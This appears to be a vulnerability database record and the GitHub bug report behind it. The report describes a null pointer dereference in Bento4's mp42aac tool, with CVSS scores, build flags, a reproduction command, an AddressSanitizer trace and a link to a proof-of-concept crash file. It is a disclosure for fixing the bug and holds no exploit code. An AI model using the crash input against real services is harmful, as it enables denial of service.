{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/416" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-628:*:*:*:*:*:*:*", "matchCriteriaId": "27A2EAA1-1740-4A14-BFFC-BD4406E9BD87", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/416
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
There is a null pointer dereference caused by unhandled exhaustive memory usage in Ap48bdlAtom.cpp. Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial gcc: 5.4.0 To reproduce the bug, compile the project with flag DCMAKE_C_FLAGS=-g -m32 -fsanitize=address,undefined then run: ./mp42aac input /dev/null The reason is that the malloc size does not check and easily lead to memory allocation failure. ![image](https://user-images.githubusercontent.com/7632714/62784397-f5302000-baf0-11e9-8876-4dc122aa9d11.png) ![image](https://user-images.githubusercontent.com/7632714/62784507-388a8e80-baf1-11e9-8a23-5b066cdbaedd.png) Here is the trace reported by ASAN: ==131030==WARNING: AddressSanitizer failed to allocate 0xffe1fff1 bytes ==131030==AddressSanitizer's allocator is terminating the process instead of returning 0 ==131030==If you don't like this behavior set allocator_may_return_null=1 ==131030==AddressSanitizer CHECK failed: ../../../../../src/libsanitizer/sanitizer_common/sanitizer_allocator.cc:147 "((0)) != (0)" (0x0, 0x0) #0 0xf71fe797 (/usr/lib32/libasan.so.2+0x9f797) #1 0xf7203a69 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib32/libasan.so.2+0xa4a69) #2 0xf717507b (/usr/lib32/libasan.so.2+0x1607b) #3 0xf7201e80 (/usr/lib32/libasan.so.2+0xa2e80) #4 0xf717a229 (/usr/lib32/libasan.so.2+0x1b229) #5 0xf71f6e16 in operator new[](unsigned int) (/usr/lib32/libasan.so.2+0x97e16) #6 0x877ebaf in AP4_DataBuffer::AP4_DataBuffer(unsigned int) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4DataBuffer.cpp:55 #7 0x8ba5673 in AP4_8bdlAtom::AP4_8bdlAtom(unsigned int, AP4_ByteStream&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap48bdlAtom.cpp:76 #8 0x8ba5673 in AP4_8bdlAtom::Create(unsigned int, AP4_ByteStream&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap48bdlAtom.cpp:64 #9 0x82e10dc in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:534 #10 0x8301ca3 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:225 #11 0x82b6bae in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:194 #12 0x82b6bae in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:139 #13 0x841a898 in AP4_MoovAtom::AP4_MoovAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4MoovAtom.cpp:80 #14 0x82e2631 in AP4_MoovAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4MoovAtom.h:56 #15 0x82e2631 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:363 #16 0x82fa1f7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:225 #17 0x82fa1f7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:151 #18 0x809a044 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4File.cpp:104 #19 0x809a044 in AP4_File::AP4_File(AP4_ByteStream&, bool) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4File.cpp:78 #20 0x8082ce7 in main /mnt/data/playground/mp42-a/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250 #21 0xf697f636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636) #22 0x808df1b (/mnt/data/playground/mp42-patch/Build/mp42aac+0x808df1b) The poc input: [poc_input6.zip](https://github.com/axiomatic-systems/Bento4/files/3486674/poc_input6.zip)
Null pointer dereference caused by unhandled exhaustive memory usage
https://api.github.com/repos/axiomatic-systems/Bento4/issues/416/comments
0
2019-08-09T14:02:54
2019-08-25T16:22:18Z
https://github.com/axiomatic-systems/Bento4/issues/416
479,003,776
416
true
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : Null pointer dereference caused by unhandled exhaustive memory usage Issue date: --- start body --- There is a null pointer dereference caused by unhandled exhaustive memory usage in Ap48bdlAtom.cpp. Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial gcc: 5.4.0 To reproduce the bug, compile the project with flag DCMAKE_C_FLAGS=-g -m32 -fsanitize=address,undefined then run: ./mp42aac input /dev/null The reason is that the malloc size does not check and easily lead to memory allocation failure. ![image](https://user-images.githubusercontent.com/7632714/62784397-f5302000-baf0-11e9-8876-4dc122aa9d11.png) ![image](https://user-images.githubusercontent.com/7632714/62784507-388a8e80-baf1-11e9-8a23-5b066cdbaedd.png) Here is the trace reported by ASAN: ==131030==WARNING: AddressSanitizer failed to allocate 0xffe1fff1 bytes ==131030==AddressSanitizer's allocator is terminating the process instead of returning 0 ==131030==If you don't like this behavior set allocator_may_return_null=1 ==131030==AddressSanitizer CHECK failed: ../../../../../src/libsanitizer/sanitizer_common/sanitizer_allocator.cc:147 "((0)) != (0)" (0x0, 0x0) #0 0xf71fe797 (/usr/lib32/libasan.so.2+0x9f797) #1 0xf7203a69 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib32/libasan.so.2+0xa4a69) #2 0xf717507b (/usr/lib32/libasan.so.2+0x1607b) #3 0xf7201e80 (/usr/lib32/libasan.so.2+0xa2e80) #4 0xf717a229 (/usr/lib32/libasan.so.2+0x1b229) #5 0xf71f6e16 in operator new[](unsigned int) (/usr/lib32/libasan.so.2+0x97e16) #6 0x877ebaf in AP4_DataBuffer::AP4_DataBuffer(unsigned int) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4DataBuffer.cpp:55 #7 0x8ba5673 in AP4_8bdlAtom::AP4_8bdlAtom(unsigned int, AP4_ByteStream&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap48bdlAtom.cpp:76 #8 0x8ba5673 in AP4_8bdlAtom::Create(unsigned int, AP4_ByteStream&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap48bdlAtom.cpp:64 #9 0x82e10dc in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:534 #10 0x8301ca3 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:225 #11 0x82b6bae in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:194 #12 0x82b6bae in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:139 #13 0x841a898 in AP4_MoovAtom::AP4_MoovAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4MoovAtom.cpp:80 #14 0x82e2631 in AP4_MoovAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4MoovAtom.h:56 #15 0x82e2631 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:363 #16 0x82fa1f7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:225 #17 0x82fa1f7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:151 #18 0x809a044 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4File.cpp:104 #19 0x809a044 in AP4_File::AP4_File(AP4_ByteStream&, bool) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4File.cpp:78 #20 0x8082ce7 in main /mnt/data/playground/mp42-a/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250 #21 0xf697f636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636) #22 0x808df1b (/mnt/data/playground/mp42-patch/Build/mp42aac+0x808df1b) The poc input: [poc_input6.zip](https://github.com/axiomatic-systems/Bento4/files/3486674/poc_input6.zip) --- end body ---
4,393
[ -0.026603126898407936, 0.015587530098855495, -0.007486923597753048, -0.004940142389386892, 0.018579231575131416, -0.01123038586229086, -0.0626569613814354, 0.0400734506547451, -0.020435620099306107, 0.024685369804501534, -0.02746228128671646, 0.002406785264611244, 0.016630789265036583, 0.023166505619883537, 0.019085519015789032, -0.0046409722417593, -0.024056345224380493, 0.00112092902418226, -0.016308605670928955, -0.007057345937937498, 0.034949205815792084, -0.036452725529670715, -0.0032007365953177214, 0.03016248345375061, -0.004675491712987423, 0.012810617685317993, -0.024501264095306396, -0.0038642806466668844, 0.009696180000901222, 0.002372265560552478, 0.012235290370881557, 0.0023971963673830032, -0.021908456459641457, 0.013109787367284298, 0.04209860414266586, 0.003248680615797639, 0.04915595054626465, 0.0381096675992012, 0.02743159793317318, 0.01653873734176159, 0.006792695727199316, -0.05409609153866768, -0.048572953790426254, 0.010601361282169819, -0.01198214665055275, 0.008046909235417843, 0.010532322339713573, 0.0006827215547673404, -0.052040256559848785, 0.014421533793210983, 0.02582068182528019, -0.013477996923029423, -0.026649152860045433, -0.07953321933746338, 0.02104930207133293, -0.019315648823976517, 0.0183184165507555, 0.03629930689930916, 0.006708314176648855, 0.02368813566863537, 0.004245914053171873, 0.017489945515990257, 0.013999626971781254, 0.027968568727374077, 0.009657824411988258, 0.029963036999106407, -0.014053324237465858, 0.008146632462739944, -0.020297540351748466, 0.024056345224380493, -0.024961525574326515, -0.0323103703558445, -0.0029859477654099464, 0.04703874513506889, 0.01621655374765396, -0.031758058816194534, 0.019637832418084145, 0.03764940798282623, -0.02970222197473049, 0.027753781527280807, -0.030745482072234154, 0.02266021817922592, -0.039920032024383545, 0.00959645677357912, 0.015648897737264633, 0.023488689213991165, -0.02109532803297043, -0.06449800729751587, -0.016523394733667374, -0.032249003648757935, 0.004579604137688875, 0.011690647341310978, 0.019852621480822563, 0.018548546358942986, 0.004917129408568144, 0.0327092669904232, -0.036176569759845734, -0.03138984739780426, -0.0596192330121994, -0.008982773870229721, -0.0356549397110939, -0.028643619269132614, 0.002178572118282318, 0.041392870247364044, 0.0057264226488769054, 0.008990445174276829, 0.015894370153546333, -0.028474858030676842, 0.02424044907093048, 0.13378272950649261, 0.007080359384417534, -0.021033959463238716, -0.025375762954354286, -0.028781699016690254, 0.010800807736814022, 0.0022188450675457716, 0.012680210173130035, -0.01744391955435276, -0.04329528287053108, -0.04108602926135063, -0.03976660966873169, -0.02172435261309147, -0.023243216797709465, 0.007571305148303509, -0.027554333209991455, 0.032218318432569504, 0.012058856897056103, -0.014881795272231102, -0.020865198224782944, -0.01670750044286251, -0.02648038975894451, -0.025621235370635986, 0.0027059551794081926, -0.020466303452849388, -0.017505286261439323, -0.01175201591104269, -0.01807294227182865, 0.03562425449490547, 0.006125316023826599, -0.011621608398854733, -0.0727827176451683, -0.017474602907896042, 0.03243310749530792, -0.016845578327775, -0.03261721134185791, -0.0037051066756248474, -0.023918267339468002, 0.022921033203601837, -0.025667261332273483, -0.013270879164338112, -0.0188093613833189, -0.019116202369332314, 0.02974824793636799, 0.0054579367861151695, 0.03019316866993904, -0.0021824075374752283, 0.00353442644700408, 0.028858408331871033, -0.02312047965824604, 0.012288987636566162, 0.0036437385715544224, -0.020466303452849388, 0.015625884756445885, -0.037956248968839645, -0.013930588029325008, -0.02115669660270214, 0.01594039797782898, 0.009105511009693146, -0.02091122418642044, 0.02655710093677044, -0.01049396675080061, 0.016615446656942368, -0.0163546334952116, 0.010202467441558838, -0.05517003685235977, -0.007494594901800156, -0.003551686182618141, 0.04716148227453232, -0.004905622452497482, -0.01199748832732439, -0.00186789536383003, 0.013094445690512657, 0.03359910473227501, 0.010401914827525616, 0.020604383200407028, -0.0362379364669323, 0.03160463646054268, -0.04667053744196892, 0.029195934534072876, 0.005419581662863493, 0.005523140542209148, 0.0005206710775382817, -0.004947813227772713, -0.005668890196830034, 0.036483410745859146, -0.0140686659142375, -0.03703572601079941, -0.006017921958118677, -0.017597340047359467, 0.002884306712076068, 0.007149398326873779, -0.025882050395011902, -0.026020128279924393, 0.019423043355345726, -0.03178874030709267, 0.012756920419633389, -0.01597108133137226, 0.05974197015166283, 0.0351639948785305, -0.0075252787210047245, -0.007947185076773167, -0.018517863005399704, 0.005968060344457626, -0.015925055369734764, -0.011521884240210056, 0.009673167020082474, -0.04519769921898842, 0.005511634051799774, -0.009212905541062355, -0.010325204581022263, 0.03286268562078476, 0.0012359945103526115, 0.03157395124435425, -0.01262651290744543, -0.005918198265135288, -0.011920778080821037, 0.001227364526130259, -0.006037099286913872, -0.003824007697403431, 0.005626699421554804, 0.027247492223978043, 0.01566424034535885, -0.01825704798102379, -0.004663985222578049, 0.03654478117823601, 0.013968942686915398, 0.007916501723229885, -0.015250004827976227, 0.0103865722194314, 0.021586274728178978, -0.00940468069165945, 0.04025755822658539, -0.022890347987413406, -0.03289337083697319, 0.018655940890312195, 0.05876007676124573, -0.025068920105695724, -0.013623746111989021, 0.004499058239161968, -0.0024029496125876904, 0.020128779113292694, -0.02483879029750824, 0.007682534866034985, 0.0034308675676584244, -0.0016099570784717798, 0.004372486378997564, 0.04848089814186096, 0.003016631817445159, -0.014268113300204277, -0.025743970647454262, 0.026771889999508858, -0.009895626455545425, -0.012833630666136742, -0.0014718786114826798, -0.013547035865485668, -0.008798670023679733, -0.033507052809000015, -0.0025678768288344145, -0.01653873734176159, -0.008691275492310524, 0.02852088399231434, -0.004690833855420351, -0.0025640411768108606, -0.04397033527493477, -0.0067543406039476395, -0.01297937985509634, 0.025697944685816765, 0.01457495428621769, -0.0037396263796836138, -0.006777353584766388, 0.009811244904994965, 0.0027021197602152824, -0.029947694391012192, 0.02964085340499878, 0.01656942069530487, 0.0112457275390625, 0.015111926011741161, -0.017919521778821945, -0.032249003648757935, -0.004238243214786053, 0.0060869609005749226, 0.008146632462739944, -0.07971733063459396, 0.01695297285914421, 0.014114691875874996, 0.023289242759346962, 0.009903297759592533, -0.0008337448816746473, -0.019668517634272575, 0.0076211667619645596, -0.01937701739370823, -0.028152674436569214, 0.004080987069755793, 0.013493338599801064, -0.02707873098552227, 0.015472464263439178, -0.0171370767056942, -0.020435620099306107, -0.0009051813394762576, -0.008560867980122566, 0.05142657458782196, -0.04544317349791527, -0.003532508620992303, -0.0313284806907177, -0.02227666601538658, -0.003898800117895007, -0.009420023299753666, -0.03106766566634178, -0.03826308995485306, 0.03341500088572502, -0.0489104762673378, 0.014060995541512966, -0.04010413587093353, 0.005105069372802973, 0.022123245522379875, -0.013316905125975609, -0.01807294227182865, 0.05237778276205063, -0.07088030129671097, 0.012603499926626682, 0.0016837907023727894, -0.021417511627078056, -0.005810804199427366, -0.036974355578422546, -0.01120737288147211, -0.0543108806014061, -0.0013654431095346808, 0.005922033917158842, 0.016201211139559746, 0.002529521705582738, -0.01919291354715824, -0.011974475346505642, 0.0026982843410223722, -0.007939514704048634, -0.013132800348103046, -0.008438130840659142, 0.0019810430239886045, -0.020374251529574394, -0.008315394632518291, 0.014682348817586899, 0.0011410654988139868, 0.011890093795955181, 0.004625630099326372, 0.002602396300062537, 0.01716776192188263, -0.018594572320580482, -0.014835769310593605, -0.008461144752800465, -0.00019357360724825412, -0.006202026270329952, 0.027354886755347252, -0.027032705023884773, 0.011583252809941769, -0.0005710122059099376, 0.012404052540659904, 0.023657452315092087, 0.014981518499553204, -0.014398520812392235, -0.006416815333068371, -0.017842812463641167, -0.00840744748711586, 0.060202229768037796, -0.023550057783722878, 0.02126409113407135, -0.006520374212414026, -0.00696145836263895, 0.030070431530475616, 0.03194216266274452, -0.04470675438642502, 0.007088030222803354, -0.0205276720225811, -0.005177943967282772, 0.014843439683318138, -0.04970826581120491, 0.02767707034945488, 0.017781443893909454, -0.025882050395011902, 0.048327479511499405, -0.023135822266340256, 0.0038566095754504204, -0.03451962769031525, 0.042374759912490845, -0.04053371399641037, -0.06247285380959511, -0.015395754016935825, 0.052745990455150604, 0.009189891628921032, -0.01352402288466692, 0.01274924911558628, -0.047100115567445755, 0.03688230365514755, 0.0016876262379810214, 0.030208509415388107, 0.010762453079223633, 0.016860920935869217, 0.036636833101511, 0.011069294065237045, -0.009335641749203205, 0.02802993729710579, -0.003921813331544399, 0.022476112470030785, -0.023105137050151825, -0.03675956651568413, -0.0012148991227149963, 0.03117506019771099, 0.029487432911992073, 0.002807596465572715, 0.008269368670880795, -0.05222436040639877, 0.028367463499307632, -0.0033656638115644455, -0.0005686149816028774, 0.018855387344956398, 0.008476486429572105, 0.02942606434226036, 0.009251260198652744, -0.01768939197063446, 0.007625002413988113, 0.004779050592333078, -0.0484195314347744, 0.009588785469532013, 0.02109532803297043, -0.007049675099551678, 0.024439897388219833, -0.006144493818283081, -0.04528975114226341, -0.010026033967733383, -0.019070176407694817, -0.020727118477225304, -0.0318194255232811, -0.027753781527280807, 0.04197586700320244, -0.04673190414905548, 0.00047440515481866896, 0.013899903744459152, -0.07388734817504883, -0.017612680792808533, -0.021356143057346344, 0.015472464263439178, -0.03629930689930916, 0.0013174990890547633, 0.02680257335305214, 0.016508053988218307, -0.00015174252621363848, 0.009550430811941624, 0.0046409722417593, -0.005151095800101757, -0.004775215405970812, 0.029656196013092995, -0.01070108450949192, -0.014751387760043144, 0.012687881477177143, 0.006175178103148937, -0.0020577532704919577, 0.005013016983866692, 0.04915595054626465, -0.014874123968183994, -0.012258303351700306, 0.0008927159360609949, -0.03169668838381767, 0.010509309358894825, 0.002861293498426676, 0.0070381686091423035, 0.003687846940010786, 0.010601361282169819, 0.010716427117586136, -0.020404934883117676, -0.016722841188311577, 0.003091424470767379, -0.05787023901939392, -0.003996605984866619, -0.008438130840659142, -0.023319926112890244, -0.009834258817136288, 0.00129640381783247, -0.008100605569779873, -0.004019618965685368, 0.024900158867239952, -0.0166001059114933, -0.00326210493221879, 0.01469769049435854, 0.0083230659365654, -0.0012244879035279155, -0.02778446488082409, 0.004522071219980717, 0.002310897223651409, -0.02213858813047409, -0.010417256504297256, 0.02666449546813965, 0.056734926998615265, -0.0004163930134382099, -0.055507563054561615, 0.03823240473866463, -0.018410468474030495, 0.020589040592312813, -0.05817708000540733, -0.0346730500459671, 0.031405191868543625, -0.004399335011839867, -0.038201723247766495, -0.0030511515215039253, -0.04001208394765854, 0.019530437886714935, -0.03715846315026283, -0.009304957464337349, -0.03933703526854515, -0.0085685383528471, -0.02448592334985733, 0.02644970640540123, 0.024087028577923775, -0.023181848227977753, -0.021908456459641457, -0.00041687244083732367, 0.018471837043762207, 0.013025405816733837, 0.018379783257842064, 0.030423298478126526, -0.007429391145706177, 0.034734416753053665, -0.016201211139559746, 0.008875380270183086, -0.002370347734540701, 0.011836396530270576, 0.04381691291928291, -0.0066737947054207325, -0.00546560762450099, 0.012304329313337803, 0.032801318913698196, -0.005672725383192301, -0.017367208376526833, 0.004564261995255947, 0.025651918724179268, -0.01811896823346615, 0.006727491971105337, -0.03464236482977867, 0.03725051507353783, 0.017489945515990257, 0.0019570710137486458, 0.005979566834867001, -0.002763488097116351, 0.03491852059960365, -0.004176875110715628, -0.00938933901488781, 0.010102744214236736, -0.001735570142045617, 0.005515469238162041, -0.025667261332273483, 0.022782955318689346, 0.016369974240660667, 0.02816801704466343, 0.00459878146648407, -0.009887956082820892, 0.006915431935340166, -0.02549849823117256, -0.012480762787163258, 0.0058683366514742374, 0.02690996788442135, 0.032279688864946365, -0.008975103497505188, 0.004686998203396797, 0.02175503596663475, 0.0018132393015548587, 0.025068920105695724, -0.0068157087080180645, -0.014682348817586899, 0.013784837909042835, -0.007931843400001526, -0.021801061928272247, -0.018701966851949692, -0.040687136352062225, 0.03636067360639572, -0.031052323058247566, -0.0014229757944121957, 0.017367208376526833, 0.01793486438691616, -0.01198214665055275, 0.00863757822662592, -0.02014411985874176, 0.008415117859840393, -0.018686626106500626, 0.008913734927773476, 0.007552127353847027, -0.014728374779224396, 0.000016480724298162386, -0.0075444565154612064, -0.024685369804501534, 0.008415117859840393, -0.00038283225148916245, 0.016661474481225014, -0.008990445174276829, -0.008399776183068752, 0.013539365492761135, -0.003613054286688566, -0.04550454020500183, -0.014413862489163876, 0.024087028577923775, 0.0026925308629870415, -0.0014862617244943976, -0.01968385837972164, 0.029057854786515236, -0.006923103239387274, 0.01670750044286251, 0.0556916669011116, 0.009849600493907928, 0.010969570837914944, 0.015786975622177124, 0.02879704162478447, 0.033997997641563416, -0.007394871208816767, 0.013362931087613106, 0.02210790477693081, -0.046578485518693924, 0.006140658166259527, -0.017597340047359467, 0.015296030789613724, 0.01555684581398964, 0.0012062692549079657, 0.0045105647295713425, -0.00609463220462203, -0.02585136517882347, -0.036207254976034164, 0.023672793060541153, 0.0059642246924340725, -0.02707873098552227, -0.003417443251237273, 0.010563005693256855, 0.015395754016935825, -0.012918012216687202, 0.0002979715063702315, -0.016584763303399086, 0.01583300344645977, -0.001698173931799829, -0.030561376363039017, 0.007575140800327063, -0.028965802863240242, 0.007590482477098703, -0.0007949103019200265, 0.006213533226400614, 0.03534809872508049, 0.011775028891861439, -0.03338431566953659, -0.01604779064655304, -0.001305992598645389, 0.012020501308143139, 0.012887327931821346, -0.009021129459142685, 0.052009571343660355, 0.0636388510465622, 0.010601361282169819, -0.028735673055052757, -0.030668770894408226, -0.025268368422985077, -0.020450962707400322, 0.0018257048213854432, 0.018824703991413116, -0.013807850889861584, -0.04047234728932381, -0.009573443792760372, 0.01080847904086113, 0.0046333009377121925, 0.008906063623726368, -0.032249003648757935, -0.0004350911476649344, 0.021463537588715553, -0.011698318645358086, -0.02134080044925213, 0.010033705271780491, 0.026050811633467674, -0.03952113911509514, 0.00810827687382698, 0.012089541181921959, -0.0005489579634740949, -0.002763488097116351, 0.022261325269937515, -0.02000604197382927, 0.008929077535867691, -0.011974475346505642, -0.00034327851608395576, -0.02203119359910488, -0.04501359537243843, 0.033230893313884735, -0.004897951614111662, 0.04038029536604881, 0.020604383200407028, 0.00021430935885291547, -0.03455031290650368, 0.026050811633467674, -0.009489062242209911, -0.008254026994109154, -0.019530437886714935, -0.007678699679672718, 0.012373369187116623, -0.0009550430113449693, -0.016262579709291458, 0.004165368620306253, 0.03519468009471893, 0.004334131255745888, 0.0026215738616883755, 0.02841348946094513, -0.015955738723278046, -0.027109414339065552, -0.009558101184666157, -0.03366047143936157, 0.012219948694109917, 0.019806595519185066, -0.013823193497955799, -0.001044218777678907, -0.0070381686091423035, -0.010593689978122711, -0.0020692599937319756, -0.023319926112890244, -0.027861176058650017, -0.014130034483969212, -0.03602315112948418, 0.014720703475177288, -0.012035843916237354, -0.0008438131189905107, -0.003091424470767379, 0.02134080044925213, 0.004545084200799465, -0.029364697635173798, -0.029241960495710373, 0.015541503205895424, 0.01254213135689497, -0.03142053261399269, -0.016906946897506714, 0.004337966442108154, -0.008675932884216309, -0.00172981689684093, 0.02308979630470276, 0.009327970445156097, -0.00318347685970366, 0.0030434804502874613, -0.02508426271378994, 0.015104254707694054, 0.00029677292332053185, -0.00522780604660511, 0.009903297759592533, -0.02213858813047409, 0.03412073478102684, 0.008944419212639332, 0.0040503027848899364, 0.0007637467933818698, -0.039152927696704865, -0.02112601138651371, 0.009113181382417679, 0.02091122418642044, -0.009128523990511894, -0.009757548570632935, 0.007878146134316921, -0.007049675099551678, -0.0075252787210047245, -0.0017902262043207884, 0.0327092669904232, 0.015480135567486286, -0.025145631283521652, 0.014367836527526379, -0.03134382143616676, 0.016523394733667374, -0.0019733719527721405, 0.010632045567035675, -0.022015850991010666, -0.02074246108531952, -0.011176688596606255, 0.051518626511096954, -0.013132800348103046, -0.014091678895056248, 0.0061061386950314045, 0.022675560787320137, 0.03246379271149635, -0.027385571971535683, 0.016768869012594223, -0.018701966851949692, 0.01024849433451891, 0.010125757195055485, -0.02221529744565487, 0.0037242842372506857, -0.02770775556564331, -0.005354377906769514, -0.003678258042782545, -0.0066277687437832355, -0.003689764766022563, 0.029410723596811295, -0.013784837909042835, -0.012802946381270885, -0.03433552384376526, 0.019591806456446648, 0.0041461908258497715, -0.038938138633966446, -0.018103627488017082, 0.023596083745360374, 0.015786975622177124, -0.028597593307495117, -0.010325204581022263, -0.019284965470433235, -0.02238406054675579, 0.005381226539611816, 0.041178081184625626, -0.04679327458143234, 0.0036379853263497353, -0.011828726157546043, -0.01583300344645977, 0.03138984739780426, 0.0022763777524232864, 0.031481899321079254, -0.003618807764723897, -0.00004590631215251051, -0.002738557057455182, 0.012381039559841156, 0.029027171432971954, -0.02134080044925213, 0.0041461908258497715, -0.00017235841369256377, -0.05940444394946098, 0.025774655863642693, 0.002247611293569207, 0.026434363797307014, 0.007578975986689329, 0.01229665894061327, 0.010102744214236736, -0.009373996406793594, 0.014237429015338421, 0.010708755813539028, 0.016385316848754883, -0.010984912514686584, 0.017996232956647873, -0.0006170383421704173, 0.003684011287987232, -0.016615446656942368, 0.04397033527493477, -0.028137331828475, -0.01845649443566799, -0.018717309460043907, -0.02882772497832775, -0.0024873309303075075, -0.017996232956647873, -0.005925869569182396, -0.028965802863240242, -0.005814639385789633, 0.0038412674330174923, 0.008829353377223015, 0.018057601526379585, -0.019223596900701523, 0.01716776192188263, -0.009343313053250313, -0.01719844527542591, -0.017459260299801826, -0.004276598338037729, 0.006397637538611889, 0.0013146224664524198, 0.051518626511096954, 0.0057877907529473305, -0.016906946897506714, -0.010348217561841011, 0.013140471652150154, 0.015863686800003052, -0.005872172303497791, -0.016369974240660667, -0.009412351995706558, -0.011284083127975464, 0.015740949660539627, -0.0150275444611907, 0.015894370153546333, 0.012603499926626682, -0.023289242759346962, -0.004364815074950457, -0.012173921801149845, 0.0010240823030471802, 0.01419140212237835, 0.025283709168434143, -0.0032640225253999233, 0.01807294227182865, -0.007939514704048634, 0.012695551849901676, 0.03777214512228966, -0.04271228611469269, 0.01026383601129055, -0.010286848992109299, -0.030960271134972572, -0.018471837043762207, 0.013738811947405338, 0.018609914928674698, -0.0430191271007061, -0.014620980247855186, 0.03930635005235672, 0.023028427734971046, -0.002009809482842684, -0.02295171655714512, -0.03728119656443596, -0.012480762787163258, -0.010908202268183231, -0.010555335320532322, -0.018993467092514038, 0.004495222587138414, -0.022153930738568306, -0.005354377906769514, 0.035716310143470764, 0.01373114064335823, -0.02143285423517227, 0.03731188178062439, 0.03436620905995369, 0.012971709482371807, 0.0007680617272853851, -0.047100115567445755, 